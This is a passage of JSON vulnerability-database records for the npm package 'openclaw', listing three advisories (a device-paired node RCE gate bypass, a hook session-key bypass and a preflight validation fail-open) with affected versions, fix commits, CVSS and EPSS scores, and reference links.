"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{
"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-68v4-hmwv-f43h"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xz8s-hj5s-wfgj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89532?format=json","vulnerability_id":"VCID-xzg5-ren5-p7gw","summary":"OpenClaw: Device-Paired Node Skips Node Scope Gate → Host RCE.md\n## Summary\nDevice-Paired Node Skips Node Scope Gate → Host RCE.md\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real in shipped v2026.3.28 because a merely device-paired node could expose node commands without node pairing, but high is sufficient given the pairing/setup prerequisites.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `3886b65ef21d02808c1a106fa1f9f69e22f71c32` — 2026-03-30T17:29:28+01:00\n\nOpenClaw thanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41352","reference_id":"","reference_type":"","scores":[{"value":"0.00536","scoring_system":"epss","scoring_elements":"0.67865","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00536","scoring_system":"epss","scoring_elements":"0.67876","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00536","scoring_system":"epss","scoring_elements":"0.67869","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41352"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3886b65ef21d02808c1a106fa1f9f69e22f71c32","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T16:36:03Z/"}],"url":"https://github.com/openclaw/openclaw/commit/3886b65ef21d02808c1a106fa1f9f69e22f71c32"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:
L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xj9w-5r6q-x6v4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T16:36:03Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xj9w-5r6q-x6v4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41352","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41352"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-node-scope-gate-bypass","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T16:36:03Z/
"}],"url":"https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-node-scope-gate-bypass"},{"reference_url":"https://github.com/advisories/GHSA-xj9w-5r6q-x6v4","reference_id":"GHSA-xj9w-5r6q-x6v4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xj9w-5r6q-x6v4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vul
nerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vul
nerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41352","GHSA-xj9w-5r6q-x6v4"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xzg5-ren5-p7gw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89941?format=json","vulnerability_id":"VCID-y65g-4baa-a7c2","summary":"OpenClaw: Hook mapping templates could bypass hook session-key opt-in\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nTemplated hook mapping `sessionKey` values were treated differently from request-supplied session keys. A hook mapping could render an externally influenced session key even when `hooks.allowRequestSessionKey` was disabled, bypassing the intended routing opt-in for hook callers.\n\nThis affects webhook routing isolation. It does not grant host execution by itself. 
Severity is medium.\n\n## Fix\n\nTemplate-rendered mapping session keys are now treated as externally supplied routing input and require `hooks.allowRequestSessionKey=true` plus the existing prefix policy checks.\n\nFix commit:\n\n- `5275d008ed33203dba3f98e969ad683a65c416c3`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45002","reference_id":"","reference_type":"","scores":[{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10694","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10682","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10719","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45002"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5275d008ed33203dba3f98e969ad683a65c416c3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:46:08Z/"}],"url":"https://github.com/openclaw/openclaw/commit/5275d008ed33203dba3f9
8e969ad683a65c416c3"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2xcp-x87w-q377","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:46:08Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2xcp-x87w-q377"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45002","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45002"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-hook-session-key-bypass-via-template-mapping","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:46:08Z/"}],"url":"https
://www.vulncheck.com/advisories/openclaw-hook-session-key-bypass-via-template-mapping"},{"reference_url":"https://github.com/advisories/GHSA-2xcp-x87w-q377","reference_id":"GHSA-2xcp-x87w-q377","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2xcp-x87w-q377"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["CVE-2026-45002","GHSA-2xcp-x87w-q377"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y65g-4baa-a7c2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89035?format=json","vulnerability_id":"VCID-y7sd-j9xn-qffs","summary":"OpenClaw's complex interpreter pipelines could skip exec script preflight validation\n## Summary\n\nBefore OpenClaw 2026.4.2, exec script preflight validation could fail open on complex interpreter invocations such as pipes or other non-simple command forms. In those cases, script-content validation could be skipped entirely.\n\n## Impact\n\nAn attacker-controlled command shape could bypass the intended preflight validation for script execution. 
This weakened a defense-in-depth guard that was meant to block unsafe script content before execution.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513` — close the fail-open bypass in exec script preflight\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @iskindar for reporting, and thanks @wsparks-vc for coordination.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34425","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06326","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.0631","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06316","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34425"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T13:00:24Z/"}],"url":"
https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T13:00:24Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34425","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34425"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T13:00:24Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass"},{"reference_url":"https://github.com/advisories/GHSA-fvx6-pj3r-5q4q","reference_id":"GHSA-fvx6-pj3r-5q4q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url"
:"https://github.com/advisories/GHSA-fvx6-pj3r-5q4q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vuln
